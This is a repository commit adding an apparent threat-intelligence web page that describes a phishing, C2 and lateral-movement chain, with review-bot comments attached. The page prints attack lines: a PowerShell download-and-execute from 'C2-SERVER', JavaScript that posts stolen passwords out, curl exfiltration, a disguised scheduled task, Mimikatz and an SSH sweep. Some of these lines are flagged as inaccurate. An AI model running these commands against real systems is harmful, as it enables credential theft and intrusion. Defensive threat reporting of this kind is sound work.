capta1n committed on
Commit
22306da
·
verified ·
1 Parent(s): 1998070

Add 2 files

Files changed (2)
  1. README.md +7 -5
  2. index.html +479 -19
README.md CHANGED
@@ -1,10 +1,12 @@
1
  ---
2
- title: Bas
3
- emoji: 🏆
4
- colorFrom: green
5
- colorTo: purple
6
  sdk: static
7
  pinned: false
 
 
8
  ---
9
 
10
- Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
 
1
  ---
2
+ title: bas
3
+ emoji: 🐳
4
+ colorFrom: yellow
5
+ colorTo: green
6
  sdk: static
7
  pinned: false
8
+ tags:
9
+ - deepsite
10
  ---
11
 
12
+ Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference
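Review bot: the README still carries nothing but front matter plus the template line `Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference` (line 12), so the Space has no description of what it publishes; since the index.html in this same commit is titled "Advanced Phishing & Lateral Movement Attack Report", add a short paragraph stating the report's scope and that indicators such as `C2-SERVER` and `1.2.3.4` are placeholders, and consider making `title: bas` (line 2) match the document title rather than a three-letter placeholder.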
index.html CHANGED
@@ -1,19 +1,479 @@
1
- <!doctype html>
2
- <html>
3
- <head>
4
- <meta charset="utf-8" />
5
- <meta name="viewport" content="width=device-width" />
6
- <title>My static Space</title>
7
- <link rel="stylesheet" href="style.css" />
8
- </head>
9
- <body>
10
- <div class="card">
11
- <h1>Welcome to your static Space!</h1>
12
- <p>You can modify this app directly by editing <i>index.html</i> in the Files and versions tab.</p>
13
- <p>
14
- Also don't forget to check the
15
- <a href="https://huggingface.co/docs/hub/spaces" target="_blank">Spaces documentation</a>.
16
- </p>
17
- </div>
18
- </body>
19
- </html>
1
+ <!DOCTYPE html>
2
+ <html lang="en">
3
+ <head>
4
+ <meta charset="UTF-8">
5
+ <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
+ <title>Advanced Phishing & Lateral Movement Attack Report</title>
7
+ <script src="https://cdn.tailwindcss.com"></script>
8
+ <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
9
+ <style>
10
+ .timeline-item:not(:last-child)::after {
11
+ content: '';
12
+ position: absolute;
13
+ left: 24px;
14
+ top: 32px;
15
+ height: calc(100% - 32px);
16
+ width: 2px;
17
+ background-color: #e5e7eb;
18
+ }
19
+ .attack-step {
20
+ transition: all 0.3s ease;
21
+ }
22
+ .attack-step:hover {
23
+ transform: translateY(-2px);
24
+ box-shadow: 0 10px 15px -3px rgba(0, 0, 0, 0.1);
25
+ }
26
+ .code-block {
27
+ font-family: 'Courier New', monospace;
28
+ background-color: #f8f9fa;
29
+ border-left: 3px solid #3b82f6;
30
+ padding: 0.75rem;
31
+ overflow-x: auto;
32
+ }
33
+ .mitre-tag {
34
+ display: inline-flex;
35
+ align-items: center;
36
+ padding: 0.25rem 0.5rem;
37
+ border-radius: 9999px;
38
+ font-size: 0.75rem;
39
+ font-weight: 600;
40
+ }
41
+ </style>
42
+ </head>
43
+ <body class="bg-gray-50">
44
+ <div class="container mx-auto px-4 py-8 max-w-5xl">
45
+ <!-- Header -->
46
+ <div class="flex flex-col md:flex-row justify-between items-start md:items-center mb-8">
47
+ <div>
48
+ <h1 class="text-3xl font-bold text-gray-800">Advanced Phishing & Lateral Movement Attack Report</h1>
49
+ <p class="text-gray-600 mt-2">Detailed analysis of a sophisticated attack chain targeting internal credentials</p>
50
+ </div>
51
+ <div class="mt-4 md:mt-0 bg-white p-3 rounded-lg shadow-sm border border-gray-200">
52
+ <div class="flex items-center">
53
+ <div class="bg-red-100 p-2 rounded-full mr-3">
54
+ <i class="fas fa-shield-alt text-red-500"></i>
55
+ </div>
56
+ <div>
57
+ <p class="text-xs text-gray-500">Threat Level</p>
58
+ <p class="font-semibold text-red-600">Critical</p>
59
+ </div>
60
+ </div>
61
+ </div>
62
+ </div>
63
+
64
+ <!-- Executive Summary -->
65
+ <div class="bg-white p-6 rounded-lg shadow-sm border border-gray-200 mb-8">
66
+ <h2 class="text-2xl font-bold text-gray-800 mb-4">Executive Summary</h2>
67
+ <div class="grid grid-cols-1 md:grid-cols-3 gap-4 mb-4">
68
+ <div class="bg-blue-50 p-4 rounded-lg">
69
+ <h3 class="font-semibold text-gray-800 mb-2">Attack Vector</h3>
70
+ <p class="text-sm text-gray-600">Spear phishing with malicious documents/links</p>
71
+ </div>
72
+ <div class="bg-purple-50 p-4 rounded-lg">
73
+ <h3 class="font-semibold text-gray-800 mb-2">Primary Target</h3>
74
+ <p class="text-sm text-gray-600">Internal SSH credentials & sensitive documents</p>
75
+ </div>
76
+ <div class="bg-red-50 p-4 rounded-lg">
77
+ <h3 class="font-semibold text-gray-800 mb-2">Impact</h3>
78
+ <p class="text-sm text-gray-600">Full internal network compromise possible</p>
79
+ </div>
80
+ </div>
81
+ <p class="text-gray-700">
82
+ This report details a sophisticated attack chain beginning with carefully crafted phishing emails, leading to C2 implantation, credential theft, and lateral movement through internal networks. The attacker demonstrates advanced techniques including domain spoofing, malicious macros, C2 infrastructure obfuscation, and browser session hijacking.
83
+ </p>
84
+ </div>
85
+
86
+ <!-- Timeline -->
87
+ <div class="relative">
88
+ <!-- Phase 1: Initial Compromise -->
89
+ <div class="relative timeline-item pl-16 pb-8">
90
+ <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
91
+ 1
92
+ </div>
93
+ <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
94
+ <div class="flex justify-between items-start">
95
+ <div>
96
+ <h3 class="font-bold text-lg text-gray-800">Initial Compromise</h3>
97
+ <p class="text-gray-600 mt-1">Spear Phishing Campaign</p>
98
+ </div>
99
+ <span class="mitre-tag bg-blue-100 text-blue-800">
100
+ <i class="fas fa-envelope mr-1"></i> T1566.001
101
+ </span>
102
+ </div>
103
+ <div class="mt-4">
104
+ <div class="flex items-start">
105
+ <div class="bg-gray-100 p-2 rounded-full mr-3 mt-1">
106
+ <i class="fas fa-user-secret text-gray-600"></i>
107
+ </div>
108
+ <div>
109
+ <h4 class="font-medium text-gray-700">Attack Details</h4>
110
+ <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
111
+ <li>Email subjects: "紧急通知:阿里云账号异常登录提醒" or "内部会议纪要(机密)"</li>
112
+ <li>Body mimics official Alibaba Cloud communications</li>
113
+ <li>Contains either malicious attachment or phishing link</li>
114
+ </ul>
115
+
116
+ <h4 class="font-medium text-gray-700 mt-3">Technical Indicators</h4>
117
+ <div class="code-block mt-2">
118
+ <p>Attachment: 阿里云安全报告_v2023.pdf (malicious macro)</p>
119
+ <p>Phishing URL: https://aliyun-support[.]com/verify</p>
120
+ <p>Spoofed sender: security@alibaba-inc.com</p>
121
+ <p>Typosquatting domain: al1baba-inc[.]com</p>
122
+ </div>
123
+ </div>
124
+ </div>
125
+ </div>
126
+ </div>
127
+ </div>
128
+
129
+ <!-- Phase 2: Execution -->
130
+ <div class="relative timeline-item pl-16 pb-8">
131
+ <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
132
+ 2
133
+ </div>
134
+ <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
135
+ <div class="flex justify-between items-start">
136
+ <div>
137
+ <h3 class="font-bold text-lg text-gray-800">Execution</h3>
138
+ <p class="text-gray-600 mt-1">Malicious Payload Delivery</p>
139
+ </div>
140
+ <span class="mitre-tag bg-purple-100 text-purple-800">
141
+ <i class="fas fa-code mr-1"></i> T1059.001
142
+ </span>
143
+ </div>
144
+ <div class="mt-4">
145
+ <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
146
+ <div>
147
+ <h4 class="font-medium text-gray-700">Malicious Document</h4>
148
+ <div class="code-block mt-2">
149
+ <p>Macro code:</p>
150
+ <p>powershell IEX (New-Object Net.WebClient).DownloadString('http://C2-SERVER/payload.ps1')</p>
151
+ </div>
152
+ <p class="text-sm text-gray-600 mt-2">Downloads and executes Cobalt Strike payload</p>
153
+ </div>
154
+ <div>
155
+ <h4 class="font-medium text-gray-700">Phishing Site</h4>
156
+ <div class="code-block mt-2">
157
+ <p>JavaScript credential theft:</p>
158
+ <p>fetch('http://C2-SERVER/steal', {</p>
159
+ <p> method: 'POST',</p>
160
+ <p> body: JSON.stringify({user: username, pass: password})</p>
161
+ <p>});</p>
162
+ </div>
163
+ <p class="text-sm text-gray-600 mt-2">Perfect replica of Alibaba Cloud login</p>
164
+ </div>
165
+ </div>
166
+ </div>
167
+ </div>
168
+ </div>
169
+
170
+ <!-- Phase 3: Persistence -->
171
+ <div class="relative timeline-item pl-16 pb-8">
172
+ <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
173
+ 3
174
+ </div>
175
+ <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
176
+ <div class="flex justify-between items-start">
177
+ <div>
178
+ <h3 class="font-bold text-lg text-gray-800">Persistence</h3>
179
+ <p class="text-gray-600 mt-1">C2 Infrastructure Establishment</p>
180
+ </div>
181
+ <span class="mitre-tag bg-red-100 text-red-800">
182
+ <i class="fas fa-server mr-1"></i> T1572
183
+ </span>
184
+ </div>
185
+ <div class="mt-4">
186
+ <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
187
+ <div>
188
+ <h4 class="font-medium text-gray-700">C2 Configuration</h4>
189
+ <div class="code-block mt-2">
190
+ <p>Cobalt Strike listener:</p>
191
+ <p>windows/x64/reflective PE</p>
192
+ <p>HTTPS with valid certificate</p>
193
+ <p>Multiple IP rotation via CDN</p>
194
+ </div>
195
+ </div>
196
+ <div>
197
+ <h4 class="font-medium text-gray-700">Persistence Methods</h4>
198
+ <div class="code-block mt-2">
199
+ <p>Registry:</p>
200
+ <p>HKCU\Software\Microsoft\Windows\CurrentVersion\Run</p>
201
+ <p>Task Scheduler:</p>
202
+ <p>schtasks /create /tn "Windows Update" /tr "C:\Windows\System32\malicious.exe"</p>
203
+ </div>
204
+ </div>
205
+ </div>
206
+ </div>
207
+ </div>
208
+ </div>
209
+
210
+ <!-- Phase 4: Credential Access -->
211
+ <div class="relative timeline-item pl-16 pb-8">
212
+ <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
213
+ 4
214
+ </div>
215
+ <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
216
+ <div class="flex justify-between items-start">
217
+ <div>
218
+ <h3 class="font-bold text-lg text-gray-800">Credential Access</h3>
219
+ <p class="text-gray-600 mt-1">SSH & Browser Credential Theft</p>
220
+ </div>
221
+ <span class="mitre-tag bg-yellow-100 text-yellow-800">
222
+ <i class="fas fa-key mr-1"></i> T1555
223
+ </span>
224
+ </div>
225
+ <div class="mt-4">
226
+ <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
227
+ <div>
228
+ <h4 class="font-medium text-gray-700">Credential Harvesting</h4>
229
+ <div class="code-block mt-2">
230
+ <p>Browser cookies:</p>
231
+ <p>Mimikatz !sekurlsa::logonpasswords</p>
232
+ <p>SSH keys:</p>
233
+ <p>search C:\Users\*\.ssh\id_rsa</p>
234
+ </div>
235
+ </div>
236
+ <div>
237
+ <h4 class="font-medium text-gray-700">Credential Storage</h4>
238
+ <div class="code-block mt-2">
239
+ <p>Windows Credential Manager:</p>
240
+ <p>cmdkey /list</p>
241
+ <p>SSH config files:</p>
242
+ <p>C:\Users\*\.ssh\config</p>
243
+ </div>
244
+ </div>
245
+ </div>
246
+ </div>
247
+ </div>
248
+ </div>
249
+
250
+ <!-- Phase 5: Lateral Movement -->
251
+ <div class="relative timeline-item pl-16 pb-8">
252
+ <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
253
+ 5
254
+ </div>
255
+ <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
256
+ <div class="flex justify-between items-start">
257
+ <div>
258
+ <h3 class="font-bold text-lg text-gray-800">Lateral Movement</h3>
259
+ <p class="text-gray-600 mt-1">Internal Network Penetration</p>
260
+ </div>
261
+ <span class="mitre-tag bg-orange-100 text-orange-800">
262
+ <i class="fas fa-arrows-alt-h mr-1"></i> T1021
263
+ </span>
264
+ </div>
265
+ <div class="mt-4">
266
+ <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
267
+ <div>
268
+ <h4 class="font-medium text-gray-700">SSH Access</h4>
269
+ <div class="code-block mt-2">
270
+ <p>ssh -i id_rsa user@10.0.0.5</p>
271
+ <p>plink.exe -ssh -P 22 -i id_rsa user@10.0.0.6</p>
272
+ </div>
273
+ <p class="text-sm text-gray-600 mt-2">Using stolen credentials for access</p>
274
+ </div>
275
+ <div>
276
+ <h4 class="font-medium text-gray-700">Internal Recon</h4>
277
+ <div class="code-block mt-2">
278
+ <p>nmap -sS 10.0.0.0/24</p>
279
+ <p>for ip in {1..254}; do ssh -o ConnectTimeout=1 user@10.0.0.$ip; done</p>
280
+ </div>
281
+ <p class="text-sm text-gray-600 mt-2">Scanning for additional targets</p>
282
+ </div>
283
+ </div>
284
+ </div>
285
+ </div>
286
+ </div>
287
+
288
+ <!-- Phase 6: Exfiltration -->
289
+ <div class="relative timeline-item pl-16">
290
+ <div class="absolute left-0 top-0 flex items-center justify-center w-12 h-12 rounded-full bg-blue-500 text-white font-bold z-10">
291
+ 6
292
+ </div>
293
+ <div class="attack-step bg-white p-6 rounded-lg shadow-sm border border-gray-200">
294
+ <div class="flex justify-between items-start">
295
+ <div>
296
+ <h3 class="font-bold text-lg text-gray-800">Exfiltration</h3>
297
+ <p class="text-gray-600 mt-1">Data Collection & Exfiltration</p>
298
+ </div>
299
+ <span class="mitre-tag bg-green-100 text-green-800">
300
+ <i class="fas fa-cloud-download-alt mr-1"></i> T1041
301
+ </span>
302
+ </div>
303
+ <div class="mt-4">
304
+ <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
305
+ <div>
306
+ <h4 class="font-medium text-gray-700">Browser Proxy</h4>
307
+ <div class="code-block mt-2">
308
+ <p>proxychains4 -q -f /path/to/config.txt firefox</p>
309
+ <p>Proxy config: 1.2.3.4:8080</p>
310
+ </div>
311
+ <p class="text-sm text-gray-600 mt-2">MITM for internal application access</p>
312
+ </div>
313
+ <div>
314
+ <h4 class="font-medium text-gray-700">Data Theft</h4>
315
+ <div class="code-block mt-2">
316
+ <p>Target files:</p>
317
+ <p>*.pem, *.key, *.sql, *.db</p>
318
+ <p>Exfiltration:</p>
319
+ <p>split -b 5MB sensitive.tar.gz | curl -X POST -F 'file=@-' http://C2-SERVER/upload</p>
320
+ </div>
321
+ </div>
322
+ </div>
323
+ </div>
324
+ </div>
325
+ </div>
326
+ </div>
327
+
328
+ <!-- MITRE ATT&CK Mapping -->
329
+ <div class="mt-12 bg-white p-6 rounded-lg shadow-sm border border-gray-200">
330
+ <h2 class="text-2xl font-bold text-gray-800 mb-4">MITRE ATT&CK Mapping</h2>
331
+
332
+ <div class="overflow-x-auto">
333
+ <table class="min-w-full divide-y divide-gray-200">
334
+ <thead class="bg-gray-50">
335
+ <tr>
336
+ <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Tactic</th>
337
+ <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Technique</th>
338
+ <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">ID</th>
339
+ <th scope="col" class="px-6 py-3 text-left text-xs font-medium text-gray-500 uppercase tracking-wider">Description</th>
340
+ </tr>
341
+ </thead>
342
+ <tbody class="bg-white divide-y divide-gray-200">
343
+ <tr>
344
+ <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Initial Access</td>
345
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Spearphishing Attachment</td>
346
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1566.001</td>
347
+ <td class="px-6 py-4 text-sm text-gray-500">Malicious documents sent via email</td>
348
+ </tr>
349
+ <tr>
350
+ <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Execution</td>
351
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">PowerShell</td>
352
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1059.001</td>
353
+ <td class="px-6 py-4 text-sm text-gray-500">Macro executes PowerShell payload</td>
354
+ </tr>
355
+ <tr>
356
+ <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Persistence</td>
357
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Registry Run Keys</td>
358
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1547.001</td>
359
+ <td class="px-6 py-4 text-sm text-gray-500">Adds malicious executable to startup</td>
360
+ </tr>
361
+ <tr>
362
+ <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Credential Access</td>
363
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Credentials from Password Stores</td>
364
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1555</td>
365
+ <td class="px-6 py-4 text-sm text-gray-500">Harvests SSH keys and browser cookies</td>
366
+ </tr>
367
+ <tr>
368
+ <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Lateral Movement</td>
369
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Remote Services: SSH</td>
370
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1021.004</td>
371
+ <td class="px-6 py-4 text-sm text-gray-500">Uses stolen SSH keys for access</td>
372
+ </tr>
373
+ <tr>
374
+ <td class="px-6 py-4 whitespace-nowrap text-sm font-medium text-gray-900">Exfiltration</td>
375
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">Exfiltration Over C2 Channel</td>
376
+ <td class="px-6 py-4 whitespace-nowrap text-sm text-gray-500">T1041</td>
377
+ <td class="px-6 py-4 text-sm text-gray-500">Data sent through established C2</td>
378
+ </tr>
379
+ </tbody>
380
+ </table>
381
+ </div>
382
+ </div>
383
+
384
+ <!-- Recommendations -->
385
+ <div class="mt-8 bg-white p-6 rounded-lg shadow-sm border border-gray-200">
386
+ <h2 class="text-2xl font-bold text-gray-800 mb-4">Defensive Recommendations</h2>
387
+
388
+ <div class="space-y-4">
389
+ <div class="flex items-start">
390
+ <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
391
+ 1
392
+ </div>
393
+ <div>
394
+ <h3 class="font-medium text-gray-800">Enhanced Email Security</h3>
395
+ <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
396
+ <li>Implement DMARC/DKIM/SPF to prevent sender spoofing</li>
397
+ <li>Deploy advanced attachment sandboxing for macro analysis</li>
398
+ <li>User training on identifying typosquatting domains</li>
399
+ </ul>
400
+ </div>
401
+ </div>
402
+
403
+ <div class="flex items-start">
404
+ <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
405
+ 2
406
+ </div>
407
+ <div>
408
+ <h3 class="font-medium text-gray-800">Endpoint Protection</h3>
409
+ <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
410
+ <li>Block Office macros from the internet zone</li>
411
+ <li>Monitor for suspicious PowerShell execution patterns</li>
412
+ <li>Implement application whitelisting for executables</li>
413
+ </ul>
414
+ </div>
415
+ </div>
416
+
417
+ <div class="flex items-start">
418
+ <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
419
+ 3
420
+ </div>
421
+ <div>
422
+ <h3 class="font-medium text-gray-800">Credential Protection</h3>
423
+ <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
424
+ <li>Enforce MFA for all SSH access</li>
425
+ <li>Regular rotation of SSH keys with automated monitoring</li>
426
+ <li>Credential guard for browser session protection</li>
427
+ </ul>
428
+ </div>
429
+ </div>
430
+
431
+ <div class="flex items-start">
432
+ <div class="bg-blue-500 text-white text-xs font-bold rounded-full w-6 h-6 flex items-center justify-center mr-3 mt-1">
433
+ 4
434
+ </div>
435
+ <div>
436
+ <h3 class="font-medium text-gray-800">Network Monitoring</h3>
437
+ <ul class="list-disc pl-5 text-sm text-gray-600 mt-1 space-y-1">
438
+ <li>Detect unusual SSH login patterns (time/location)</li>
439
+ <li>Monitor for internal systems communicating with external IPs</li>
440
+ <li>Implement network segmentation for critical assets</li>
441
+ </ul>
442
+ </div>
443
+ </div>
444
+ </div>
445
+ </div>
446
+ </div>
447
+
448
+ <footer class="bg-gray-100 border-t border-gray-200 py-6 mt-12">
449
+ <div class="container mx-auto px-4 text-center text-gray-500 text-sm">
450
+ <p>Advanced Phishing & Lateral Movement Attack Report | Generated on <span id="current-date"></span></p>
451
+ <p class="mt-1">Confidential - For authorized personnel only</p>
452
+ </div>
453
+ </footer>
454
+
455
+ <script>
456
+ // Set current date
457
+ const now = new Date();
458
+ const options = { year: 'numeric', month: 'long', day: 'numeric', hour: '2-digit', minute: '2-digit' };
459
+ document.getElementById('current-date').textContent = now.toLocaleDateString('en-US', options);
460
+
461
+ // Add animation to attack steps
462
+ const observer = new IntersectionObserver((entries) => {
463
+ entries.forEach(entry => {
464
+ if (entry.isIntersecting) {
465
+ entry.target.style.opacity = '1';
466
+ entry.target.style.transform = 'translateY(0)';
467
+ }
468
+ });
469
+ }, { threshold: 0.1 });
470
+
471
+ document.querySelectorAll('.attack-step').forEach(step => {
472
+ step.style.opacity = '0';
473
+ step.style.transform = 'translateY(20px)';
474
+ step.style.transition = 'all 0.4s ease-out';
475
+ observer.observe(step);
476
+ });
477
+ </script>
478
+ <p style="border-radius: 8px; text-align: center; font-size: 12px; color: #fff; margin-top: 16px;position: fixed; left: 8px; bottom: 8px; z-index: 10; background: rgba(0, 0, 0, 0.8); padding: 4px 8px;">Made with <img src="https://enzostvs-deepsite.hf.space/logo.svg" alt="DeepSite Logo" style="width: 16px; height: 16px; vertical-align: middle;display:inline-block;margin-right:3px;filter:brightness(0) invert(1);"><a href="https://enzostvs-deepsite.hf.space" style="color: #fff;text-decoration: underline;" target="_blank" >DeepSite</a> - 🧬 <a href="https://enzostvs-deepsite.hf.space?remix=capta1n/bas" style="color: #fff;text-decoration: underline;" target="_blank" >Remix</a></p></body>
479
+ </html>
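Review bot: the `<head>` (lines 7-8) loads `<script src="https://cdn.tailwindcss.com"></script>` and the Font Awesome stylesheet from third-party CDNs with no `integrity` or `crossorigin` attribute, so for a page whose footer reads "Confidential - For authorized personnel only" a compromise of either CDN can run arbitrary script in every viewer's browser; the Tailwind Play CDN is a runtime compiler documented as development-only and cannot be SRI-pinned, so ship a compiled stylesheet instead, and add an SRI hash to the cdnjs `<link>`. The content also contradicts itself on technique mapping: the Phase 3 card is headed "Persistence" but tagged `T1572` (Protocol Tunneling, line 182), while the MITRE table below maps Persistence to `T1547.001` (line 358); pick one and make the card tag and table row agree. Two command lines do not do what the captions claim: `split -b 5MB sensitive.tar.gz | curl -X POST -F 'file=@-' http://C2-SERVER/upload` (line 319) sends nothing, because `split` writes chunk files rather than to stdout, and `Mimikatz !sekurlsa::logonpasswords` (line 231) dumps LSASS logon secrets, not the "Browser cookies" it is listed under. In the recommendations, "Credential guard for browser session protection" (line 426) misdescribes Windows Credential Guard, which isolates LSASS-held secrets and does nothing for browser sessions; reword or replace with a browser-appropriate control. Finally, the footer's "Generated on" value (lines 450, 457-459) is computed from the viewer's clock at load time, so the report's stated generation date changes on every visit; hard-code the actual report date.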